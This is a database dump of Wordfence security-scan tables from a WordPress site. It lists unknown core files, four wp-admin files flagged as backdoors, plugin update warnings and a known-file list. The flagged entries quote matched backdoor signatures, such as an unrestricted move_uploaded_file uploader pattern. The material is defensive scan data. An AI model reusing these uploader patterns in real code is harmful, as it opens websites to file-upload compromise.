rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/widgets/class-wp-widget-media-audio.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27693,1631424954,1631424954,'new','knownfile',75,'7408d79a635a605c2d360cd65160799f','9ef2c0f21ad5bd8e6b566c544c73b991','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-media-gallery.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/widgets/class-wp-widget-media-gallery.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27694,1631424954,1631424954,'new','knownfile',75,'adb7ade70fe666ec7be1217fe09f3cbc','e6c353cb8d2e25865c8a7ec2f7b9fd18','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-media-image.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/widgets/class-wp-widget-media-image.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27695,1631424954,1631424954,'new','knownfile',75,'06bf8bfb175a7b00179da4d1dac868ca','3862b9c6e8c2c55ee2372e0b78df29ac','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-media-video.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/widgets/class-wp-widget-media-video.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27696,1631424954,1631424954,'new','knownfile',75,'1fd0243c9e6d1688cf3b32cdbf1a56ec','50dee6119394596f084b0cb0c0310bed','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-media.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/widgets/class-wp-widget-media.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27697,1631424954,1631424954,'new','knownfile',75,'39956d5c3d3e0896fe72d1aaab5601c4','e29163971878e253c8e59c01969ffe4f','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-meta.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/widgets/class-wp-widget-meta.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27698,1631424956,1631424956,'new','knownfile',75,'8feb155731dcf0f30f8eff9152261c61','2cbe2d8b7814b5d4aa91f56777956058','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-pages.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/widgets/class-wp-widget-pages.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27699,1631424957,1631424957,'new','knownfile',75,'ad5d6e4bb147af95dc4b3a89e7d45adf','25ac6c40b942aec55eccb0057bc3f9f4','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-recent-comments.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/widgets/class-wp-widget-recent-comments.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27700,1631424957,1631424957,'new','knownfile',75,'d086cb33e5f64489b639bf4ad942b09c','f089b15d214ee3d3ee35e58d36e5be2e','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-recent-posts.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/widgets/class-wp-widget-recent-posts.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27701,1631424958,1631424958,'new','knownfile',75,'8b2d83b960e88198255a173610595f71','9f89e8211eda231cd4ffe65065fba968','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-rss.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/widgets/class-wp-widget-rss.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27702,1631424958,1631424958,'new','knownfile',75,'a92cc4e58f3e4e21c8e3d051fb0a2e68','32a060de21778d3bcab0e6e20426fa89','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-search.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/widgets/class-wp-widget-search.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27703,1631424958,1631424958,'new','knownfile',75,'bfe07ace8f85604c9005cdc54f628814','5292733e61693d9f0314322208714c91','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-tag-cloud.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/widgets/class-wp-widget-tag-cloud.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27704,1631424958,1631424958,'new','knownfile',75,'3f45e340a65729fa92b8e96a9a508924','c67a8d84d88e10b2b073683e8107f3d4','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-text.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/widgets/class-wp-widget-text.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27705,1631424958,1631424958,'new','knownfile',75,'68bf09ad7165e6c676467e38e7188ae7','84acdf32c8dffa513f6e272db89c9e4c','Unknown file in WordPress core: wp-includes/wp-includes/widgets.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:35:\"wp-includes/wp-includes/widgets.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27706,1631424958,1631424958,'new','knownfile',75,'c487c2f869954dc8139b6f4462bdae3a','76dcecef8905bdc496d25fd0de95b142','Unknown file in WordPress core: wp-includes/wp-includes/wlwmanifest.xml','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/wlwmanifest.xml\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27707,1631424958,1631424958,'new','knownfile',75,'1b4c0842f6d04cd89cf5dda19f2b6d6a','f0f2d748f77fd58383fa816c8fba4030','Unknown file in WordPress core: wp-includes/wp-includes/wp-db.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:33:\"wp-includes/wp-includes/wp-db.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27708,1631424958,1631424958,'new','knownfile',75,'8306725d9fe84e10673c0f6dc8c39026','255ad7b6a04834a395aca0ec0e1d9120','Unknown file in WordPress core: wp-includes/wp-includes/wp-diff.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:35:\"wp-includes/wp-includes/wp-diff.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27709,1631425049,1631425049,'new','file',100,'b6e539efdd2c3638557c7cda570fb681','0ffc23fe7a18ca6fa3a8f357124b081b','File appears to be malicious or unsafe: wp-admin/wpimages.php','This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <strong style=\"color: #F00;\" class=\"wf-split-word\">move_uploaded_file($_FILES[&#039;file&#039;][&#039;tmp_name&#039;], $_POST[</strong> <br><br>The issue type is: <strong>Backdoor:PHP/fileuploader.POST.8789</strong><br>Description: <strong>A file uploader - typically malicious but might also be benign but extremely unsafe code</strong>','a:9:{s:4:\"file\";s:21:\"wp-admin/wpimages.php\";s:4:\"shac\";s:64:\"B9CD83B61B38FBB1EC91DAD8754D1DD0E53ED3408E50004DCACE2FEFBCDAF66B\";s:9:\"highSense\";b:0;s:8:\"betaSigs\";s:1:\"0\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;s:13:\"canRegenerate\";b:0;s:8:\"wpconfig\";b:0;}'),(27710,1631425050,1631425050,'new','file',100,'d514831c6563aa4ae909629fcd67ab57','fadd356e5e9270e64978cafa35da2cba','File appears to be malicious or unsafe: wp-admin/cachewpcheck.php','This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <strong style=\"color: #F00;\" class=\"wf-split-word\">move_uploaded_file($_FILES[&#039;file&#039;][&#039;tmp_name&#039;], $_POST[</strong> <br><br>The issue type is: <strong>Backdoor:PHP/fileuploader.POST.8789</strong><br>Description: <strong>A file uploader - typically malicious but might also be benign but extremely unsafe code</strong>','a:9:{s:4:\"file\";s:25:\"wp-admin/cachewpcheck.php\";s:4:\"shac\";s:64:\"1C0ED39A3F3850029023CE96478DCA888710E4A446D77C44177BF610B779E2AE\";s:9:\"highSense\";b:0;s:8:\"betaSigs\";s:1:\"0\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;s:13:\"canRegenerate\";b:0;s:8:\"wpconfig\";b:0;}'),(27711,1631425050,1631425050,'new','file',100,'cf8337289d0deeb3abdb1e30a9546d5e','f2c379d0e8d9dee5560d9d032b37a9af','File appears to be malicious or unsafe: wp-admin/css/index.php','This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <strong style=\"color: #F00;\" class=\"wf-split-word\">$_COOKIE;(count($</strong> <br><br>The issue type is: <strong>Backdoor:PHP/cookie.count.10422</strong><br>Description: <strong>Code often seen in file managers and backdoors.</strong>','a:9:{s:4:\"file\";s:22:\"wp-admin/css/index.php\";s:4:\"shac\";s:64:\"4E1DB26549D01E8857624F51C7DCBD037ABD737C2B382556F0D8900E6ED8B856\";s:9:\"highSense\";b:0;s:8:\"betaSigs\";s:1:\"0\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;s:13:\"canRegenerate\";b:0;s:8:\"wpconfig\";b:0;}'),(27712,1631425050,1631425050,'new','file',100,'6a0c2aa18e863359627ea260e4d3e188','be1b772055b81fa1dbdec33563fd672a','File appears to be malicious or unsafe: wp-admin/object-cache.php','This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <strong style=\"color: #F00;\" class=\"wf-split-word\">move_uploaded_file($_FILES[&#039;file&#039;][&#039;tmp_name&#039;], $_POST[</strong> <br><br>The issue type is: <strong>Backdoor:PHP/fileuploader.POST.8789</strong><br>Description: <strong>A file uploader - typically malicious but might also be benign but extremely unsafe code</strong>','a:9:{s:4:\"file\";s:25:\"wp-admin/object-cache.php\";s:4:\"shac\";s:64:\"81B9A3A33CE3365516D91C2D72FDC3A1D3E599D93F93E16527D90958064782FF\";s:9:\"highSense\";b:0;s:8:\"betaSigs\";s:1:\"0\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;s:13:\"canRegenerate\";b:0;s:8:\"wpconfig\";b:0;}'),(27725,1631615032,1631615032,'new','wfUpgrade',75,'24117975f6a30dcc10eb13acb08a1b7a','24117975f6a30dcc10eb13acb08a1b7a','Your WordPress version is out of date','WordPress version 5.8.1 is now available. Please upgrade immediately to get the latest security updates from WordPress.','a:2:{s:14:\"currentVersion\";s:5:\"5.7.3\";s:10:\"newVersion\";s:5:\"5.8.1\";}'),(27726,1631615032,1631615032,'new','wfPluginUpgrade',50,'56076fa839ff75bbcccc8a4db6d9f5d7','56076fa839ff75bbcccc8a4db6d9f5d7','The Plugin \"Wordfence Security\" needs an upgrade (7.5.4 -> 7.5.5).','You need to upgrade \"Wordfence Security\" to the newest version to ensure you have any security fixes the developer has released.','a:18:{s:4:\"Name\";s:18:\"Wordfence Security\";s:9:\"PluginURI\";s:25:\"http://www.wordfence.com/\";s:7:\"Version\";s:5:\"7.5.4\";s:11:\"Description\";s:131:\"Wordfence Security &#8211; Anti-virus, Firewall and Malware Scan <cite>By <a href=\"http://www.wordfence.com/\">Wordfence</a>.</cite>\";s:6:\"Author\";s:49:\"<a href=\"http://www.wordfence.com/\">Wordfence</a>\";s:9:\"AuthorURI\";s:25:\"http://www.wordfence.com/\";s:10:\"TextDomain\";s:9:\"wordfence\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:1;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:58:\"<a href=\"http://www.wordfence.com/\">Wordfence Security</a>\";s:10:\"AuthorName\";s:9:\"Wordfence\";s:10:\"pluginFile\";s:81:\"/home/bournesociety.org.uk/public_html/wp-content/plugins/wordfence/wordfence.php\";s:10:\"newVersion\";s:5:\"7.5.5\";s:4:\"slug\";s:9:\"wordfence\";s:5:\"wpURL\";s:39:\"https://wordpress.org/plugins/wordfence\";s:10:\"vulnerable\";b:0;}'),(27727,1631615032,1631615032,'new','wfPluginUpgrade',100,'6f76367711608fc031c73d8f02a58448','6f76367711608fc031c73d8f02a58448','The Plugin \"WP Cerber Security, Anti-spam &amp; Malware Scan\" needs an upgrade (8.8.5 -> 8.9.3).','You need to upgrade \"WP Cerber Security, Anti-spam &amp; Malware Scan\" to the newest version to ensure you have any security fixes the developer has released.','a:19:{s:4:\"Name\";s:48:\"WP Cerber Security, Anti-spam &amp; Malware Scan\";s:9:\"PluginURI\";s:20:\"https://wpcerber.com\";s:7:\"Version\";s:5:\"8.8.5\";s:11:\"Description\";s:408:\"Defends WordPress against hacker attacks, spam, trojans, and viruses. Malware scanner and integrity checker. Hardening WordPress with a set of comprehensive security algorithms. Spam protection with a sophisticated bot detection engine and reCAPTCHA. Tracks user and intruder activity with powerful email, mobile and desktop notifications. <cite>By <a href=\"https://wpcerber.com\">Cerber Tech Inc.</a>.</cite>\";s:6:\"Author\";s:51:\"<a href=\"https://wpcerber.com\">Cerber Tech Inc.</a>\";s:9:\"AuthorURI\";s:20:\"https://wpcerber.com\";s:10:\"TextDomain\";s:9:\"wp-cerber\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:1;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:83:\"<a href=\"https://wpcerber.com\">WP Cerber Security, Anti-spam &amp; Malware Scan</a>\";s:10:\"AuthorName\";s:16:\"Cerber Tech Inc.\";s:10:\"pluginFile\";s:81:\"/home/bournesociety.org.uk/public_html/wp-content/plugins/wp-cerber/wp-cerber.php\";s:10:\"newVersion\";s:5:\"8.9.3\";s:4:\"slug\";s:9:\"wp-cerber\";s:5:\"wpURL\";s:39:\"https://wordpress.org/plugins/wp-cerber\";s:10:\"vulnerable\";b:1;s:17:\"vulnerabilityLink\";s:73:\"https://wpvulndb.com/vulnerabilities/0c06abf1-f01f-4268-a105-02b1327427cf\";}'),(27728,1631615032,1631615032,'new','wfThemeUpgrade',50,'8c3bd09c6618edb429806b816c3de1dd','8c3bd09c6618edb429806b816c3de1dd','The Theme \"SG Window\" needs an upgrade (1.2.1 -> 1.2.3).','You need to upgrade \"SG Window\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"1.2.3\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/theme/sg-window.1.2.3.zip\";s:3:\"URL\";s:39:\"https://wordpress.org/themes/sg-window/\";s:4:\"Name\";s:9:\"SG Window\";s:4:\"name\";s:9:\"SG Window\";s:7:\"version\";s:5:\"1.2.1\";s:10:\"vulnerable\";b:0;}');
/*!40000 ALTER TABLE `wp_wfissues` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfknownfilelist`
--

DROP TABLE IF EXISTS `wp_wfknownfilelist`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfknownfilelist` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `path` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=4267 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfknownfilelist`
--

LOCK TABLES `wp_wfknownfilelist` WRITE;
/*!40000 ALTER TABLE `wp_wfknownfilelist` DISABLE KEYS */;
INSERT INTO `wp_wfknownfilelist` VALUES (1,'index.php'),(2,'license.txt'),(3,'readme.html'),(4,'wp-activate.php'),(5,'wp-admin/about.php'),(6,'wp-admin/admin-ajax.php'),(7,'wp-admin/admin-footer.php'),(8,'wp-admin/admin-functions.php'),(9,'wp-admin/admin-header.php'),(10,'wp-admin/admin-post.php'),(11,'wp-admin/admin.php'),(12,'wp-admin/async-upload.php'),(13,'wp-admin/authorize-application.php'),(14,'wp-admin/cachewpcheck.php'),(15,'wp-admin/comment.php'),(16,'wp-admin/credits.php'),(17,'wp-admin/css/about-rtl.css'),(18,'wp-admin/css/about-rtl.min.css'),(19,'wp-admin/css/about.css'),(20,'wp-admin/css/about.min.css'),(21,'wp-admin/css/admin-menu-rtl.css'),(22,'wp-admin/css/admin-menu-rtl.min.css'),(23,'wp-admin/css/admin-menu.css'),(24,'wp-admin/css/admin-menu.min.css'),(25,'wp-admin/css/code-editor-rtl.css'),(26,'wp-admin/css/code-editor-rtl.min.css'),(27,'wp-admin/css/code-editor.css'),(28,'wp-admin/css/code-editor.min.css'),(29,'wp-admin/css/color-picker-rtl.css'),(30,'wp-admin/css/color-picker-rtl.min.css'),(31,'wp-admin/css/color-picker.css'),(32,'wp-admin/css/color-picker.min.css'),(33,'wp-admin/css/colors/_admin.scss'),(34,'wp-admin/css/colors/_mixins.scss'),(35,'wp-admin/css/colors/_variables.scss'),(36,'wp-admin/css/colors/blue/colors-rtl.css'),(37,'wp-admin/css/colors/blue/colors-rtl.min.css'),(38,'wp-admin/css/colors/blue/colors.css'),(39,'wp-admin/css/colors/blue/colors.min.css'),(40,'wp-admin/css/colors/blue/colors.scss'),(41,'wp-admin/css/colors/coffee/colors-rtl.css'),(42,'wp-admin/css/colors/coffee/colors-rtl.min.css'),(43,'wp-admin/css/colors/coffee/colors.css'),(44,'wp-admin/css/colors/coffee/colors.min.css'),(45,'wp-admin/css/colors/coffee/colors.scss'),(46,'wp-admin/css/colors/ectoplasm/colors-rtl.css'),(47,'wp-admin/css/colors/ectoplasm/colors-rtl.min.css'),(48,'wp-admin/css/colors/ectoplasm/colors.css'),(49,'wp-admin/css/colors/ectoplasm/colors.min.css'),(50,'wp-admin/css/colors/ectoplasm/colors.scss'),(51,'wp-admin/css/colors/light/colors-rtl.css'),(52,'wp-admin/css/colors/light/colors-rtl.min.css'),(53,'wp-admin/css/colors/light/colors.css'),(54,'wp-admin/css/colors/light/colors.min.css'),(55,'wp-admin/css/colors/light/colors.scss'),(56,'wp-admin/css/colors/midnight/colors-rtl.css'),(57,'wp-admin/css/colors/midnight/colors-rtl.min.css'),(58,'wp-admin/css/colors/midnight/colors.css'),(59,'wp-admin/css/colors/midnight/colors.min.css'),(60,'wp-admin/css/colors/midnight/colors.scss'),(61,'wp-admin/css/colors/modern/colors-rtl.css'),(62,'wp-admin/css/colors/modern/colors-rtl.min.css'),(63,'wp-admin/css/colors/modern/colors.css'),(64,'wp-admin/css/colors/modern/colors.min.css'),(65,'wp-admin/css/colors/modern/colors.scss'),(66,'wp-admin/css/colors/ocean/colors-rtl.css'),(67,'wp-admin/css/colors/ocean/colors-rtl.min.css'),(68,'wp-admin/css/colors/ocean/colors.css'),(69,'wp-admin/css/colors/ocean/colors.min.css'),(70,'wp-admin/css/colors/ocean/colors.scss'),(71,'wp-admin/css/colors/sunrise/colors-rtl.css'),(72,'wp-admin/css/colors/sunrise/colors-rtl.min.css'),(73,'wp-admin/css/colors/sunrise/colors.css'),(74,'wp-admin/css/colors/sunrise/colors.min.css'),(75,'wp-admin/css/colors/sunrise/colors.scss'),(76,'wp-admin/css/common-rtl.css'),(77,'wp-admin/css/common-rtl.min.css'),(78,'wp-admin/css/common.css'),(79,'wp-admin/css/common.min.css'),(80,'wp-admin/css/customize-controls-rtl.css'),(81,'wp-admin/css/customize-controls-rtl.min.css'),(82,'wp-admin/css/customize-controls.css'),(83,'wp-admin/css/customize-controls.min.css'),(84,'wp-admin/css/customize-nav-menus-rtl.css'),(85,'wp-admin/css/customize-nav-menus-rtl.min.css'),(86,'wp-admin/css/customize-nav-menus.css'),(87,'wp-admin/css/customize-nav-menus.min.css'),(88,'wp-admin/css/customize-widgets-rtl.css'),(89,'wp-admin/css/customize-widgets-rtl.min.css'),(90,'wp-admin/css/customize-widgets.css'),(91,'wp-admin/css/customize-widgets.min.css'),(92,'wp-admin/css/dashboard-rtl.css'),(93,'wp-admin/css/dashboard-rtl.min.css'),(94,'wp-admin/css/dashboard.css'),(95,'wp-admin/css/dashboard.min.css'),(96,'wp-admin/css/deprecated-media-rtl.css'),(97,'wp-admin/css/deprecated-media-rtl.min.css'),(98,'wp-admin/css/deprecated-media.css'),(99,'wp-admin/css/deprecated-media.min.css'),(100,'wp-admin/css/edit-rtl.css'),(101,'wp-admin/css/edit-rtl.min.css'),(102,'wp-admin/css/edit.css'),(103,'wp-admin/css/edit.min.css'),(104,'wp-admin/css/farbtastic-rtl.css'),(105,'wp-admin/css/farbtastic-rtl.min.css'),(106,'wp-admin/css/farbtastic.css'),(107,'wp-admin/css/farbtastic.min.css'),(108,'wp-admin/css/forms-rtl.css'),(109,'wp-admin/css/forms-rtl.min.css'),(110,'wp-admin/css/forms.css'),(111,'wp-admin/css/forms.min.css'),(112,'wp-admin/css/index.php'),(113,'wp-admin/css/install-rtl.css'),(114,'wp-admin/css/install-rtl.min.css'),(115,'wp-admin/css/install.css'),(116,'wp-admin/css/install.min.css'),(117,'wp-admin/css/l10n-rtl.css'),(118,'wp-admin/css/l10n-rtl.min.css'),(119,'wp-admin/css/l10n.css'),(120,'wp-admin/css/l10n.min.css'),(121,'wp-admin/css/list-tables-rtl.css'),(122,'wp-admin/css/list-tables-rtl.min.css'),(123,'wp-admin/css/list-tables.css'),(124,'wp-admin/css/list-tables.min.css'),(125,'wp-admin/css/login-rtl.css'),(126,'wp-admin/css/login-rtl.min.css'),(127,'wp-admin/css/login.css'),(128,'wp-admin/css/login.min.css'),(129,'wp-admin/css/media-rtl.css'),(130,'wp-admin/css/media-rtl.min.css'),(131,'wp-admin/css/media.css'),(132,'wp-admin/css/media.min.css'),(133,'wp-admin/css/nav-menus-rtl.css'),(134,'wp-admin/css/nav-menus-rtl.min.css'),(135,'wp-admin/css/nav-menus.css'),(136,'wp-admin/css/nav-menus.min.css'),(137,'wp-admin/css/revisions-rtl.css'),(138,'wp-admin/css/revisions-rtl.min.css'),(139,'wp-admin/css/revisions.css'),(140,'wp-admin/css/revisions.min.css'),(141,'wp-admin/css/site-health-rtl.css'),(142,'wp-admin/css/site-health-rtl.min.css'),(143,'wp-admin/css/site-health.css'),(144,'wp-admin/css/site-health.min.css'),(145,'wp-admin/css/site-icon-rtl.css'),(146,'wp-admin/css/site-icon-rtl.min.css'),(147,'wp-admin/css/site-icon.css'),(148,'wp-admin/css/site-icon.min.css'),(149,'wp-admin/css/themes-rtl.css'),(150,'wp-admin/css/themes-rtl.min.css'),(151,'wp-admin/css/themes.css'),(152,'wp-admin/css/themes.min.css'),(153,'wp-admin/css/widgets-rtl.css'),(154,'wp-admin/css/widgets-rtl.min.css'),(155,'wp-admin/css/widgets.css'),(156,'wp-admin/css/widgets.min.css'),(157,'wp-admin/css/wp-admin-rtl.css'),(158,'wp-admin/css/wp-admin-rtl.min.css'),(159,'wp-admin/css/wp-admin.css'),(160,'wp-admin/css/wp-admin.min.css'),(161,'wp-admin/custom-background.php'),(162,'wp-admin/custom-header.php'),(163,'wp-admin/customize.php'),(164,'wp-admin/edit-comments.php'),(165,'wp-admin/edit-form-advanced.php'),(166,'wp-admin/edit-form-blocks.php'),(167,'wp-admin/edit-form-comment.php'),(168,'wp-admin/edit-link-form.php'),(169,'wp-admin/edit-tag-form.php'),(170,'wp-admin/edit-tags.php'),(171,'wp-admin/edit.php'),(172,'wp-admin/erase-personal-data.php'),(173,'wp-admin/export-personal-data.php'),(174,'wp-admin/export.php'),(175,'wp-admin/freedoms.php'),(176,'wp-admin/images/about-badge.svg'),(177,'wp-admin/images/about-color-palette-vert.svg'),(178,'wp